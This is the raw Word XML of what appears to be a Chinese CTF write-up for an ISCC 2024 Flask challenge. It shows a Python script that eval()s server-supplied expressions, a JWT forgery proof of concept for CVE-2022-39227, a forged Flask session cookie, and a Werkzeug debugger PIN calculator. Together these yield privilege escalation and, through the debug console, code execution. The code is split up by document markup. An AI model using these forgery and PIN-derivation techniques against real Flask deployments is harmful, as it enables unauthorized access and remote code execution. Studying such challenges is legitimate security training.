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5C7952D2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BC55DD" w:rsidRPr="00C346CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF4043" w14:textId="780C58A6" w:rsidR="00AF064E" w:rsidRDefault="00BC55DD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627F037B" w:rsidR="00AF064E" w:rsidRDefault="00BC55DD" w:rsidP="001043FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC55DD">
        <w:t>Flask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:t>中的pin值计算</w:t>
      </w:r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25A01A4B" w14:textId="76F9B8C6" w:rsidR="00EA3779" w:rsidRDefault="00BC55DD" w:rsidP="00EA3779">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="236E25"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">看页面源码有base64 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="236E25"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>L2dldHVzZXJuYW1l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C56E45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Courier New" w:hAnsi="Courier New" w:hint="eastAsia"/>
          <w:color w:val="236E25"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>解密得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/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getusername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4FBEA83D" w14:textId="32C4F300" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>于是进去发现是海螺</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650CACD3" w14:textId="5F7DA7A5" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传进去 请告诉我username是什么</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633FE8B2" w14:textId="5A9B25E2" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00EA3779">
      <w:pPr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hint="eastAsia"/>
        </w:rPr>
        <w:t>于是就能拿到username为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>pincalculate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4189DE10" w14:textId="7C74408C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传{app.py}得到/crawler路由</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B458E" w14:textId="25E0056B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运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F113D" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRPr="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC5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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77652B4C" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRPr="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC5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 xml:space="preserve">response1 = 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requests.get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('http://101.200.138.180:10006/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get_expression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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3AF027" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRPr="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC5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response2 = requests.get('http://101.200.138.180:10006/crawler?answer={}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'.format</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(eval(response1.json()['expression'].replace("÷","/").replace("×","*"))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D32C9" w14:textId="5966B424" w:rsidR="00BC55DD" w:rsidRPr="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC5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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>response2.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E41DC1" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;h1&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/local/lib/python3.11/site-packages/flask/app.py&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4A41BB" w14:textId="12DD4182" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;h1&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uuidnode_mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>位于/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>woddenfish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183790C5" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365561F9" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE1FAD2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BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jwt:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1lIjoiZG9uYXRlIiwicXVhbnRpdHkiOjF9.gT7yG_zYb22iGVXcGtSVzYr-fAeb_Nyv4KbeH3Ez8hc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C378F6B" w14:textId="33740F7A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用</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ISCC_muyu_2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>解码，篡改{"name": "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donate","quantity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": 1}为{"name": "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admin","quantity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": 100000000}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A85AB9A" w14:textId="77777777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得到"佛曰：功德圆满。地址02:42:ac:18:00:02:,机器码提示给你了/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machine_id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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C108F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CVE-2022-39227-Python-JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A364C4" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import loads, dumps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D85DA" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>jwcrypto.common</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import base64url_encode, base64url_decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE4BD16" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5436B402" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A48159" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>def topic(topic):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F031E42" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    [header, payload, signature] = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>topic.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('.')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC852C" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parsed_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = loads(base64url_decode(payload))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667DAF7D" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parsed_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC24BB0" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parsed_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>["role"] = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDE93BF" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>dumps(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parsed_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, separators=(',', ':')))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD70D7C" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fake_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = base64url_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>encode(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(dumps(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parsed_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, separators=(',', ':'))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D14B4" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fake_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1080223F" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return '{" ' + header + '.' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fake_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"} '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAE9119" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A012721" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0946D590" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>print(topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTQ1NDQ0MzgsImlhdCI6MTcxNDU0MDgzOCwianRpIjoiTzZ3VHhmR096cjdrQTRBemlnamE2QSIsIm5iZiI6MTcxNDU0MDgzOCwicm9sZSI6Im1lbWJlciIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9.hSUaV-X4mcdxaIglVPQ_RApAuNCFqSKHFyPzsnHsdtNSDlkCxAx9Hb4OXV7NcSNx6e2FGqveKTh86xWTC6nZPcTtk1BtjQJQ-YlxtCoHfiwNrzI6irlFtUAlekxIMrgJRFfNSrmbduq_eOiZp1L09F_dV1Rs1hyotM-1VIVk1HeBzTgSMFVCe-GFqO5g0iwvzDv8UTr0HiD3cYAP43BNdDWJFCNYQjssoAlyX4apamKToJpuQRNztnVqpgy5ZzMVHSL66DXR9EBDT-bgHiNOpm99n2yQKYKjnitSYmmnv_FPp8WFTBm9H_Q0LAUUcLGOv3YqgJ_FyWDhwIVpFQF5wQ'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856B1F3" w14:textId="77777777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0B6A04E" w14:textId="77777777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DDCD4F9" w14:textId="77777777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E378A6F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结果传到/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vipprice?token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=...，得到"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welcome_to_iscc_club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"，以其为密钥篡改/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supervipprice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路由的session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C6AA9A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 xml:space="preserve">python flask_session_cookie_manager3.py encode -s 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welcome_to_iscc_club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 xml:space="preserve"> -t "{\"role\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>":\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>supervip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\"}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378BAD76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BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eyJyb2xlIjoic3VwZXJ2aXAifQ.ZjHTvA.IFfl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3Usg-vQSfsxnaC1k2A5hChs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A67B4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55DD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>得到"acff8a1c-6825-4b9b-b8e1-8983ce1a8b94"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD628B" w14:textId="77777777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11598B8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import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hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="334A0A3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from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itertool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import chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76346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import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argparse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63C5753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92F026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def sub_114514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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7BABBF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h =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hashlib.md5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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227863B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for b in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chain(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F95B56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if not b:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5CEF0F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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614BE698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if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isinstanc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b, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA2E6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b =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b.encod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'utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832454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updat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b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98D9A3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">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updat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b'cookiesal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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E20D1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181C30A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n = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C822FBD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if n is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796E0F5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updat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b'pinsal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')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4E965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n = ('%09d' % int(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hexdigest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), 16))[:9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E9F0C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64C5E697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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C1DFA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if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is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1286C19C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for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in 5, 4, 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE439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if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len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(n) %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= 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3370A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'-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'.join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(n[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x:x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+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].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jus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, '0')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C75F2D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            for x in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range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 xml:space="preserve">0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len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(n)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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F0F33A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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAFAD7F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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779FA82A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n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43035AF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2C51AAE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return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</w:p>
    <w:p w14:paraId="0E9D6F76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8C9CB3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def sub_7f7f7f7f7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f(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00861CE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h =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hashlib.sha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1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340EAF0B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for b in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chain(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325E0187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if not b:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D76CA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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1173044E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if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isinstanc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b, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0478E92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b =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b.encod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"utf-8")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D941A5D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updat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b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C41BEE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updat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b"cookiesal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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70518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2F385C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n = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EE01C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if n is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C83EFB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updat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b"pinsal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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5224EE7C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n = f"{int(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h.hexdigest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), 16):09d}"[:9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDDF9F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7CA65CB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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB0157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if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is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4033F4F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for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in 5, 4, 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2449317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if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len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(n) %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= 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FBB9F6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"-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".join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(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219E56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   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n[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 xml:space="preserve">x: x +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].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jus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, "0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5681EAB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    for x in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range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 xml:space="preserve">0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len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(n)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roup_siz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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51157F7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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C6BE2F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    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237AEA6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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7EC596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n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436EDB5E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0EE270C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return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rrrr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="200C5A28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14EB734C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def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macToInt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(windows):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B2D80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windows =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windows.replac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":", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315EE2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return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str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int(windows, 16))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5DA90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6329619B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if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459253C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 =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argparse.ArgumentParser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(description = "Calculate Python Flask Pin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A48BF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.add_argument('-u', '--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username',required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True, type = str, help = "运行flask用户的用户名")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5899CBE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.add_argument('-m', '--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modnam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', type = str, default = "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flask.app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", help = "默认为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flask.app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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2F787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.add_argument('-a', '--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appname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', type = str, default = "Flask", help = "默认为Flask")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C4AA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.add_argument('-p', '--path', required = True, type = str, help = "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getattr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(mod, '__file__', None):flask包中app.py的路径")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3822E8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.add_argument('-M', '--MAC', required = True, type = str, help = "MAC地址")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA01A7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ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp.add_argument('-i', '--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machineId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', type = str, default = "", help = "机器ID")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222313C8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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp.parse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_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA920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E8032F7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[</w:t>
      </w:r>
    </w:p>
